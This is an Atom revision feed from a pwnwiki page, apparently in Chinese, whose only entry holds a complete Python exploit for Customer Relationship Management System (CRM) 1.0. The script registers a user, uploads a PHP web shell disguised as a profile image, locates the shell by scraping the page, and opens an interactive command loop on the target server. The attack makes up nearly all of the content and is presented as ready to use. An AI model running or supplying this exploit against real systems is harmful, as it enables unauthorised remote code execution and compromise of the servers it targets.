<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Customer_Relationship_Management_System_%28CRM%29_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-cn</id>
	<title>Customer Relationship Management System (CRM) 1.0 遠程代碼執行漏洞/zh-cn - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Customer_Relationship_Management_System_%28CRM%29_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-cn"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Customer_Relationship_Management_System_(CRM)_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;action=history"/>
	<updated>2026-04-10T12:14:24Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Customer_Relationship_Management_System_(CRM)_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=5713&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;Customer Relationship Management System (CRM) 1.0 远程代码执行漏洞&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Customer_Relationship_Management_System_(CRM)_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=5713&amp;oldid=prev"/>
		<updated>2021-06-24T02:03:52Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;Customer Relationship Management System (CRM) 1.0 远程代码执行漏洞&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==影响版本==&lt;br /&gt;
Version: 1.x&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution&lt;br /&gt;
# Date: 21.06.2021&lt;br /&gt;
# Exploit Author: Ishan Saha&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip&lt;br /&gt;
# Version: 1.x&lt;br /&gt;
# Tested on: Ubuntu&lt;br /&gt;
&lt;br /&gt;
# REQUREMENTS # &lt;br /&gt;
#     run pip3 install requests colorama beautifulsoup4&lt;br /&gt;
&lt;br /&gt;
# DESCRIPTION #&lt;br /&gt;
&lt;br /&gt;
#    # Customer relationship management system is vulnerable to malicious file upload on account update option &amp;amp; customer create option&lt;br /&gt;
&lt;br /&gt;
#    # Exploit Working:&lt;br /&gt;
#    # 1. Starting a session with the server &lt;br /&gt;
#    # 2. Registering a user hackerctf : hackerctf and adding payload in image&lt;br /&gt;
#    # 3. Finding the uploaded file location in the username image tag &lt;br /&gt;
#    # 4. Runing the payload file  to give a shell&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
import requests , time&lt;br /&gt;
from bs4 import BeautifulSoup as bs&lt;br /&gt;
from colorama import Fore, Back, Style&lt;br /&gt;
&lt;br /&gt;
# Variables : change the URL according to need&lt;br /&gt;
URL=&amp;quot;http://192.168.0.245/crm/&amp;quot;                     # CHANGE THIS &lt;br /&gt;
shellcode = &amp;quot;&amp;lt;?php system($_GET['cmd']);?&amp;gt;&amp;quot;&lt;br /&gt;
filename = &amp;quot;shell.php&amp;quot;&lt;br /&gt;
content_data = {&amp;quot;id&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;firstname&amp;quot;:&amp;quot;ishan&amp;quot;,&amp;quot;lastname&amp;quot;:&amp;quot;saha&amp;quot;,&amp;quot;username&amp;quot;:&amp;quot;hackerctf&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;hackerctf&amp;quot;}&lt;br /&gt;
authdata={&amp;quot;username&amp;quot;:&amp;quot;hackerctf&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;hackerctf&amp;quot;}&lt;br /&gt;
def format_text(title,item):&lt;br /&gt;
  cr = '\r\n'&lt;br /&gt;
  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr &lt;br /&gt;
  item=str(item)&lt;br /&gt;
  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +&amp;quot; : &amp;quot;+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET&lt;br /&gt;
  return text&lt;br /&gt;
&lt;br /&gt;
ShellSession = requests.Session()&lt;br /&gt;
response = ShellSession.post(URL+&amp;quot;classes/Users.php?f=create_customer&amp;quot;,data=content_data ,files={&amp;quot;img&amp;quot;:(filename,shellcode,&amp;quot;application/php&amp;quot;)})&lt;br /&gt;
response = ShellSession.post(URL+&amp;quot;classes/Login.php?f=clogin&amp;quot;,data=authdata)&lt;br /&gt;
response = ShellSession.get(URL + &amp;quot;customer/&amp;quot;)&lt;br /&gt;
soup = bs(response.text,&amp;quot;html.parser&amp;quot;)&lt;br /&gt;
location= soup.find('img')['src']&lt;br /&gt;
&lt;br /&gt;
#print statements&lt;br /&gt;
print(format_text(&amp;quot;Target&amp;quot;,URL),end='')&lt;br /&gt;
print(format_text(&amp;quot;Shell Upload&amp;quot;,&amp;quot;success&amp;quot; if response.status_code ==200 else &amp;quot;fail&amp;quot;),end='')&lt;br /&gt;
print(format_text(&amp;quot;shell location&amp;quot;,location),end='')&lt;br /&gt;
print(format_text(&amp;quot;Initiating Shell&amp;quot;,&amp;quot;[*]Note- This is a custom shell, upgrade to NC!&amp;quot;))&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
    cmd = input(Style.BRIGHT+ Fore.RED+&amp;quot;SHELL&amp;gt;&amp;gt;&amp;gt; &amp;quot;+ Fore.RESET)&lt;br /&gt;
    if cmd == 'exit':&lt;br /&gt;
        break&lt;br /&gt;
    print(ShellSession.get(location + &amp;quot;?cmd=&amp;quot;+cmd).content.decode())&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>